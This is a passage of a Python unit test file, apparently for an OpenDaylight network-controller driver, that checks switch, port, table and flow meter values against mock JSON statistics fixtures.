def test_meter_switch_table(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table', expected_data)
def test_meter_switch_table_active_entries(self):
expected_data = [
(11, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.active.entries', expected_data)
def test_meter_switch_table_lookup_packets(self):
expected_data = [
(816, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.lookup.packets', expected_data)
def test_meter_switch_table_matched_packets(self):
expected_data = [
(220, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.matched.packets', expected_data)
def test_meter_switch_flow(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
]
self._test_for_meter('switch.flow', expected_data)
def test_meter_switch_flow_duration_seconds(self):
expected_data = [
(1828, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_seconds', expected_data)
def test_meter_switch_flow_duration_nanoseconds(self):
expected_data = [
(397000000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_nanoseconds', expected_data)
def test_meter_switch_flow_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.packets', expected_data)
def test_meter_switch_flow_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.bytes', expected_data)
class TestOpenDayLightDriverComplex(_Base):
flow_data = {
"flowStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"flowStatistic": [
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.1"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "0",
"durationNanoseconds": "397000000",
"durationSeconds": "1828",
"packetCount": "0",
"tableId": "0"
},
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.2"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "89",
"durationNanoseconds": "200000",
"durationSeconds": "5648",
"packetCount": "30",
"tableId": "1"
}
]
}
]
}
port_data = {
"portStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"portStatistic": [
{
"nodeConnector": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
{
"nodeConnector": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "12740",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "182",
"transmitBytes": "12110",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "173"
},
{
"nodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "12180",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "174",
"transmitBytes": "12670",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "181"
},
{
"nodeConnector": {
"id": "1",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
{
"nodeConnector": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
}
]
}
]
}
table_data = {
"tableStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"tableStatistic": [
{
"activeCount": "11",
"lookupCount": "816",
"matchedCount": "220",
"nodeTable": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
},
{
"activeCount": "20",
"lookupCount": "10",
"matchedCount": "5",
"nodeTable": {
"id": "1",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
}
]
}
]
}
topology_data = {
"edgeProperties": [
{
"edge": {
"headNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"type": "OF"
},
"tailNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"properties": {
"bandwidth": {
"value": 10000000000
},
"config": {
"value": 1
},
"name": {
"value": "s2-eth3"
},
"state": {
"value": 1
},
"timeStamp": {
"name": "creation",
"value": 1379527162648
}
}
},
{
"edge": {
"headNodeConnector": {
"id": "5",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"tailNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:04",
"type": "OF"
},
"type": "OF"
}
},
"properties": {
"timeStamp": {
"name": "creation",
"value": 1379527162648
}
}
}
]
}
switch_data = {
"nodeProperties": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"properties": {
"actions": {
"value": "4095"
},
"buffers": {
"value": "256"
},
"capabilities": {
"value": "199"
},
"description": {
"value": "None"
},
"macAddress": {
"value": "00:00:00:00:00:02"
},
"tables": {
"value": "-1"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291227877"
}
}
},
{
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"properties": {
"actions": {
"value": "1024"
},
"buffers": {
"value": "512"
},
"capabilities": {
"value": "1000"
},
"description": {
"value": "Foo Bar"
},
"macAddress": {
"value": "00:00:00:00:00:03"
},
"tables": {
"value": "10"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291228000"
}
}
}
]
}
user_links_data = {
"userLinks": [
{
"dstNodeConnector": "OF|5@OF|00:00:00:00:00:00:00:05",
"name": "link1",
"srcNodeConnector": "OF|3@OF|00:00:00:00:00:00:00:02",
"status": "Success"
}
]
}
active_hosts_data = {
"hostConfig": [
{
"dataLayerAddress": "00:00:00:00:01:01",
"networkAddress": "1.1.1.1",
"nodeConnectorId": "9",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:01",
"nodeType": "OF",
"staticHost": "false",
"vlan": "0"
},
{
"dataLayerAddress": "00:00:00:00:02:02",
"networkAddress": "2.2.2.2",
"nodeConnectorId": "1",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:02",
"nodeType": "OF",
"staticHost": "true",
"vlan": "0"
}
]
}
inactive_hosts_data = {
"hostConfig": [
{
"dataLayerAddress": "00:00:00:01:01:01",
"networkAddress": "1.1.1.3",
"nodeConnectorId": "8",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:01",
"nodeType": "OF",
"staticHost": "false",
"vlan": "0"
},
{
"dataLayerAddress": "00:00:00:01:02:02",
"networkAddress": "2.2.2.4",
"nodeConnectorId": "0",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:02",
"nodeType": "OF",
"staticHost": "false",
"vlan": "1"
}
]
}
def test_meter_switch(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "4095",
"properties_buffers": "256",
"properties_capabilities": "199",
"properties_description": "None",
"properties_macAddress": "00:00:00:00:00:02",
"properties_tables": "-1",
"properties_timeStamp_connectedSince": "1377291227877"
}),
(1, "00:00:00:00:00:00:00:03", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "1024",
"properties_buffers": "512",
"properties_capabilities": "1000",
"properties_description": "Foo Bar",
"properties_macAddress": "00:00:00:00:00:03",
"properties_tables": "10",
"properties_timeStamp_connectedSince": "1377291228000"
}),
]
self._test_for_meter('switch', expected_data)
def test_meter_switch_port(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3',
'user_link_node_id': '00:00:00:00:00:00:00:05',
'user_link_node_port': '5',
'user_link_status': 'Success',
'user_link_name': 'link1',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2',
'topology_node_id': '00:00:00:00:00:00:00:03',
'topology_node_port': '2',
"topology_bandwidth": 10000000000,
"topology_config": 1,
"topology_name": "s2-eth3",
"topology_state": 1,
"topology_timeStamp_creation": 1379527162648
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1',
'host_status': 'active',
'host_dataLayerAddress': '00:00:00:00:02:02',
'host_networkAddress': '2.2.2.2',
'host_staticHost': 'true',
'host_vlan': '0',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0',
'host_status': 'inactive',
'host_dataLayerAddress': '00:00:00:01:02:02',
'host_networkAddress': '2.2.2.4',
'host_staticHost': 'false',
'host_vlan': '1',
}),
]
self._test_for_meter('switch.port', expected_data)
def test_meter_switch_port_receive_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(182, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(174, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.packets', expected_data)
def test_meter_switch_port_transmit_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(173, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(181, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.packets', expected_data)
def test_meter_switch_port_receive_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(12740, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(12180, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.bytes', expected_data)
def test_meter_switch_port_transmit_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(12110, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(12670, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.bytes', expected_data)
def test_meter_switch_port_receive_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.drops', expected_data)
def test_meter_switch_port_transmit_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.drops', expected_data)
def test_meter_switch_port_receive_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.errors', expected_data)
def test_meter_switch_port_transmit_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.errors', expected_data)
def test_meter_switch_port_receive_frame_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.frame_error', expected_data)
def test_meter_switch_port_receive_overrun_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.overrun_error',
expected_data)
def test_meter_switch_port_receive_crc_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.crc_error', expected_data)
def test_meter_switch_port_collision_count(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.collision.count', expected_data)
def test_meter_switch_table(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table', expected_data)
def test_meter_switch_table_active_entries(self):
expected_data = [
(11, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(20, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.active.entries', expected_data)
def test_meter_switch_table_lookup_packets(self):
expected_data = [
(816, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(10, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.lookup.packets', expected_data)
def test_meter_switch_table_matched_packets(self):
expected_data = [
(220, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(5, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.matched.packets', expected_data)
def test_meter_switch_flow(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
]
self._test_for_meter('switch.flow', expected_data)
def test_meter_switch_flow_duration_seconds(self):
expected_data = [
(1828, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(5648, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_seconds', expected_data)
def test_meter_switch_flow_duration_nanoseconds(self):
expected_data = [
(397000000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(200000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_nanoseconds', expected_data)
def test_meter_switch_flow_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(30, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.packets', expected_data)
def test_meter_switch_flow_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(89, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.bytes', expected_data)
| apache-2.0 | 4,576,517,831,753,559,600 | 37.857562 | 79 | 0.389299 | false |
